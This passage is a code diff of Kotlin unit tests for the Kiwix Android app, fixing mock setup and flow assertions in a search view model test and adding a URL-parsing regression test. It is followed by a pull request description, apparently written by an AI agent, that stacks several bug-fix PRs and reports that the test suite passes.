+      val suggestionSearch: SuggestionSearch = mockk(relaxed = true)
 
       viewModel.uiState.test {
         skipItems(1)
@@ -196,7 +202,10 @@ internal class SearchViewModelTest {
       runTest {
         val searchTerm = "searchTerm"
         val searchOrigin = FromWebView
-        val suggestionSearch: SuggestionSearch = mockk()
+        // relaxed: SuggestionSearch.dispose() is a native (JNI) method - a non-relaxed
+        // `every { ... }` stub would invoke it for real during recording and crash
+        // with UnsatisfiedLinkError in this plain-JVM test environment.
+        val suggestionSearch: SuggestionSearch = mockk(relaxed = true)
         viewModel.uiState.test {
           skipItems(1)
 
@@ -208,9 +217,10 @@ internal class SearchViewModelTest {
           )
           advanceUntilIdle()
 
-          skipItems(1)
-
-          val item = awaitItem()
+          // Use the most recent item rather than a fixed skipItems()/awaitItem() count -
+          // seeding the debounced query (see emissionOf()) emits one extra intermediate
+          // uiState update whose exact position isn't the point of this assertion.
+          val item = expectMostRecentItem()
           assertThat(item.searchState.searchTerm).isEqualTo(searchTerm)
           assertThat(item.searchState.recentResults).isEqualTo(listOf(RecentSearchListItem("", "")))
           assertThat(item.searchState.searchOrigin).isEqualTo(searchOrigin)
@@ -263,6 +273,11 @@ internal class SearchViewModelTest {
       coEvery {
         searchResultGenerator.generateSearchResults(searchTerm, zimFileReader)
       } returns suggestionSearch
+      // Also seed the debounced query, not just the raw Filter action - otherwise the
+      // still-"" debounced flow's own stale default fires later (once its debounce
+      // delay elapses under advanceUntilIdle()) and reverts filter back to "", which
+      // superseded the real SuggestionSearch and (correctly) disposed it.
+      viewModel.onSearchValueChanged(searchTerm)
       viewModel.actions.tryEmit(Filter(searchTerm))
       recentsFromDb.tryEmit(databaseResults)
       viewModel.actions.tryEmit(ScreenWasStartedFrom(searchOrigin))

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/utils/NetworkUtilsTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/utils/NetworkUtilsTest.kt
@@ -154,6 +154,14 @@ class NetworkUtilsTest {
   }
 
   @Test
+  fun `getFileNameFromUrl does not crash when a slash follows the question mark`() {
+    // Previously threw StringIndexOutOfBoundsException: see #5070.
+    val result = NetworkUtils.getFileNameFromUrl("https://host/a?b/file.zim")
+
+    assertEquals("file.zim", result)
+  }
+
+  @Test
   fun `parseURL returns empty when beginIndex greater than endIndex`() {
     every { context.getString(R.string.zim_no_pic) } returns "No Pictures"
     every { context.getString(R.string.zim_no_vid) } returns "No Videos"


### PR DESCRIPTION
> **AI-assisted change proposal.** Filed by agent driven by @soloturn via [GDD](https://siliconsaga.github.io/yggdrasil/gdd/).

Purpose: test all fixes from #5070 at once, stacked in the order the ticket lists them. Left to the maintainer's discretion whether and how to merge — all of this, or the individual parts via their own PRs.

Stack (in order):
1. #5072 — Native/JNI crash risk
2. #5071 — Security
3. #5073 — Silent logic bugs
4. #5075 — Crashes, Resource/memory leaks, Other
5. #5077 — Minor

One merge conflict between #5072 and #5073 (both touch `ZimReaderContainer.kt`) resolved by hand, combining the read/write lock with the range-skip fix. One more between #5071 and #5077 (both touch `BasicAuthInterceptor.kt`) resolved by hand, keeping both the host/key allowlist and the hoisted regex constants.

All 7 sections of #5070 are now stacked.

Verified on the combined branch: `compileDebugKotlin` (core+app), `detektDebug` clean. Full `:core:testDebugUnitTest` suite — 0 failures.
